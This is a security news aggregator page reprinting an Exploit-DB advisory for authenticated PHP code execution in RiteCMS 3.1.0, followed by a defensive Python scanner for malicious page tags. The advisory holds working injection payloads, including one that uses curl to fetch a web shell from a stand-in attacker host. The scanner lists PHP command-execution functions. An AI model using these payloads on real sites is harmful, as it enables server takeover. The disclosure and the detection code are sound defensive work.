Security News

Cybersecurity news aggregator

HIGH Vulnerabilities Exploit-DB

[webapps] RiteCMS 3.1.0 - Authenticated Remote Code Execution

RiteCMS version 3.1.0 contains an authenticated Remote Code Execution vulnerability where a user with page-editing privileges can inject arbitrary PHP code via the `[function:...]` tag within page content, which is then evaluated by the `content_function()` handler. The article does not provide a CVSS score, a fixed version, or a specific workaround.

EDB-ID: 52488
CVE: N/A
Author: RED
Type: WEBAPPS
Platform: MULTIPLE
Date: 2026-04-06

# Exploit Title: RiteCMS 3.1.0 - Authenticated Remote Code Execution
# Date: 2025-10-26
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://github.com/handylulu/RiteCMS
# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
# Version: 3.1.0
# Tested on: Windows XP

## Vulnerability Description

RiteCMS v3.1.0 contains an authenticated Remote Code Execution (RCE) via its content_function() handler: [function:...] tags in page content are evaluated, allowing a user with page-editing privileges to execute arbitrary PHP on the server.

## Exploit Code

Create or edit any page with the following content:

[function:system('whoami')]

## Steps to Reproduce

1. Login as administrator
2. Create new page or edit existing page
3. Insert [function:system('whoami')] in content
4. Save and view page
5. Command output will be displayed

## additional payloads

[function:system('curl http://attacker/shell.php -o shell.php')]
[function:system('id')]
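A defender-side check for the issue described above, as an added example that is not part of the original advisory or of RiteCMS: it scans stored page content for `[function:...]` tags and flags those that call PHP command-execution or code-evaluation functions, or that are not on a site allowlist. The `ALLOWED` names, the input shape taken by `audit` (page id mapped to content) and the sample pages are assumptions constructed for illustration.

```python
import re

# PHP built-ins that execute OS commands or evaluate code.
DANGEROUS = {"system", "exec", "shell_exec", "passthru", "popen",
             "proc_open", "pcntl_exec", "eval", "assert"}
# Assumption: tag bodies this site legitimately uses (hypothetical names).
ALLOWED = {"show_gallery", "contact_form"}
TAG = "[function:"

def tag_bodies(content):
    """Yield each [function:...] body; quotes and nested [] do not end the tag early."""
    pos = 0
    while (start := content.find(TAG, pos)) != -1:
        i, quote, depth = start + len(TAG), None, 0
        while i < len(content):
            ch = content[i]
            if quote:
                if ch == "\\":
                    i += 1              # skip the escaped character
                elif ch == quote:
                    quote = None
            elif ch in "'\"":
                quote = ch
            elif ch == "[":
                depth += 1
            elif ch == "]":
                if depth == 0:
                    break               # closing bracket of the tag itself
                depth -= 1
            i += 1
        yield content[start + len(TAG):i]   # an unterminated tag yields the rest
        pos = i + 1

def classify(body):
    """'dangerous' if an execution construct is called, 'unexpected' if not allowlisted, else 'ok'."""
    called = {name.lower() for name in re.findall(r"([A-Za-z_]\w*)\s*\(", body)}
    if called & DANGEROUS or "`" in body:   # backticks are PHP's shell-exec operator
        return "dangerous"
    return "ok" if body.strip() in ALLOWED else "unexpected"

def audit(pages):
    """pages: {page_id: content}. Return (page_id, body, verdict) for every non-ok tag."""
    return [(pid, body, verdict) for pid, content in pages.items()
            for body in tag_bodies(content)
            if (verdict := classify(body)) != "ok"]

# Constructed sample content, not taken from a real site.
SAMPLE = {"home": "<p>Welcome</p>[function:show_gallery]",
          "about": "<p>x</p>[function:system('whoami')]",
          "news": "[function:strtoupper($_GET['q'])] and [function:contact_form]"}
```

Treat every `unexpected` result as needing review as well: the advisory states that tag bodies are evaluated as PHP, so the `DANGEROUS` set is a triage aid and the allowlist is the actual control.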
